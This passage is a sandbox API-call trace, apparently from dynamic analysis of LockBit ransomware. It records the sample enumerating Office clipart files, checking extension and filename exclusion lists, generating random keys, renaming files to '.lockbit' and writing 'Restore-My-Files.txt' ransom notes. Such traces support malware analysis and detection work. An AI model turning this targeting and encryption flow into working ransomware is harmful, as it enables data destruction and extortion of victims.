0x1fa2ed8 [0177.165] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.166] free (_Block=0x1fa2ed8) [0177.166] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02276_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.166] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.166] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.166] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e7d7f00, ftCreationTime.dwHighDateTime=0x1bd4bce, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3e7d7f00, ftLastWriteTime.dwHighDateTime=0x1bd4bce, nFileSizeHigh=0x0, nFileSizeLow=0x17a1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02413_.WMF", cAlternateFileName="")) returned 1 [0177.166] lstrcmpiW (lpString1=".", lpString2="SO02413_.WMF") returned -1 [0177.166] lstrcmpiW (lpString1="..", lpString2="SO02413_.WMF") returned -1 [0177.166] PathFindExtensionW (pszPath="SO02413_.WMF") returned=".WMF" [0177.166] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.166] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.166] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.166] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.166] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.166] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.166] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.166] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.167] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.167] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02413_.WMF") returned -1 [0177.168] lstrcmpiW (lpString1="ntldr", lpString2="SO02413_.WMF") returned -1 [0177.168] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02413_.WMF") returned -1 [0177.168] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02413_.WMF") returned -1 [0177.168] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02413_.WMF") returned -1 [0177.168] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02413_.WMF") returned 1 [0177.168] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02413_.WMF") returned -1 [0177.168] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.168] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02413_.WMF") returned=".WMF" [0177.168] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.168] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.168] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.169] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.169] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.169] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.169] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.169] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.169] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.169] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.169] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.169] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.169] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.169] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.169] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.169] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.169] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.169] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02413_.WMF.lockbit") returned 72 [0177.169] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02413_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0177.173] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.174] malloc (_Size=0x40068) returned 0x3df0008 [0177.174] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=96796) returned 1 [0177.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.174] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.176] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02413_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02413_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.176] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.176] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.177] free (_Block=0x1fa2ed8) [0177.177] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02413_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.177] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.177] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.178] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9503b100, ftCreationTime.dwHighDateTime=0x1bd4c00, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9503b100, ftLastWriteTime.dwHighDateTime=0x1bd4c00, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02431_.WMF", cAlternateFileName="")) returned 1 [0177.178] lstrcmpiW (lpString1=".", lpString2="SO02431_.WMF") returned -1 [0177.178] lstrcmpiW (lpString1="..", lpString2="SO02431_.WMF") returned -1 [0177.178] PathFindExtensionW (pszPath="SO02431_.WMF") returned=".WMF" [0177.178] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.178] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.179] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.179] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.180] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.180] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.180] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.180] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.180] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.180] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.180] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02431_.WMF") returned -1 [0177.180] lstrcmpiW (lpString1="ntldr", lpString2="SO02431_.WMF") returned -1 [0177.180] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02431_.WMF") returned -1 [0177.180] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02431_.WMF") returned -1 [0177.180] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02431_.WMF") returned -1 [0177.180] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02431_.WMF") returned 1 [0177.180] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02431_.WMF") returned -1 [0177.180] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.180] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02431_.WMF") returned=".WMF" [0177.180] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.180] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.180] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.180] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.180] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.180] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.180] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.180] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.181] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.181] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02431_.WMF.lockbit") returned 72 [0177.181] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02431_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02431_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.182] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.183] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.183] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1648) returned 1 [0177.183] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.183] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.183] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.184] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.190] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02431_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02431_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.190] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.190] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.191] free (_Block=0x1fa2ed8) [0177.191] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02431_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.191] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.191] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.191] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x937fbc00, ftCreationTime.dwHighDateTime=0x1bd4bf3, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x937fbc00, ftLastWriteTime.dwHighDateTime=0x1bd4bf3, nFileSizeHigh=0x0, nFileSizeLow=0x5b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02437_.WMF", cAlternateFileName="")) returned 1 [0177.191] lstrcmpiW (lpString1=".", lpString2="SO02437_.WMF") returned -1 [0177.191] lstrcmpiW (lpString1="..", lpString2="SO02437_.WMF") returned -1 [0177.191] PathFindExtensionW (pszPath="SO02437_.WMF") returned=".WMF" [0177.191] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.191] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.192] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.193] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.193] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02437_.WMF") returned -1 [0177.193] lstrcmpiW (lpString1="ntldr", lpString2="SO02437_.WMF") returned -1 [0177.193] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02437_.WMF") returned -1 [0177.193] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02437_.WMF") returned -1 [0177.194] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02437_.WMF") returned -1 [0177.194] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02437_.WMF") returned 1 [0177.194] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02437_.WMF") returned -1 [0177.194] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.194] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02437_.WMF") returned=".WMF" [0177.194] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.194] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.194] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") 